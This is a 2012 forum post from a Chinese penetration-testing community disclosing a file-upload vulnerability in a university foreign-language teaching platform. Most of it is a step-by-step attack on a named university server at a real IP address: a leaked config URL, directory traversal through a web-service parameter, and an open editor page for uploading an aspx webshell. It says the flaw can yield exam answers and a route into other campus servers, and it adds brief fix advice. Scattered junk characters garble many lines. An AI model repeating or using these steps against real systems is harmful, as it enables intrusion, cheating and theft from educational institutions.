中国网络渗透测试联盟

标题: 新理念外语网络教学平台文件上传漏洞 [打印本页]

---

作者: admin    时间: 2012-12-4 11:10
标题: 新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：

以南开大学的为例:
& p" L6 `. F* Y; D& k4 ]) phttp://222.30.60.3/NPELS
% R9 o$ y" P5 n! ?( z5 }0 @$ @- tNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
) Z% D8 V* }) E<setting name="Update_CommonSvr_CommonService" serializeAs="String">
, N. ]; _$ P' L3 m' q# J<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
1 X4 w" e1 J/ n3 r' n% ^: a* `</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
5 R* g3 K, G' V9 B4 E1 r</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
4 y; P4 F. G' h! ^" y0 @使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
% {7 h; V8 ~  L2 m3 `$ `进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
: k% B* M/ B) S' o3 }# R
发现
$ r/ B9 i, d- T' l6 r6 Dhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可

" x. d# y1 z4 ?5 c( ~* SOOXX

Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
- \' c5 |' r. c- j: R" e漏洞证明：
8 _  S8 ~/ D! T6 P0 F
0 i2 q8 ?: p  a" J5 k, m0 T4 b列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
0 Y; q& f' O. y7 M文件上传：
" X$ z* A% l; z# E/ i6 fhttp://222.30.60.3/npelsv/editor/editor.htm
2 l" ?& C# m! p, x- D5 E! ^. y
上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
7 O2 g; _( ~3 C% y
修复方案：
/ E2 g- H; L4 R: _, ?/ {6 R# v好像考试系统必须使用 CommonService.asmx
" D! f- h5 @0 {+ ^* C/ e最好配置文件加密或者用别的方式不让它泄露出来
7 i5 I1 p) }, a! r( j( {1 ^并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2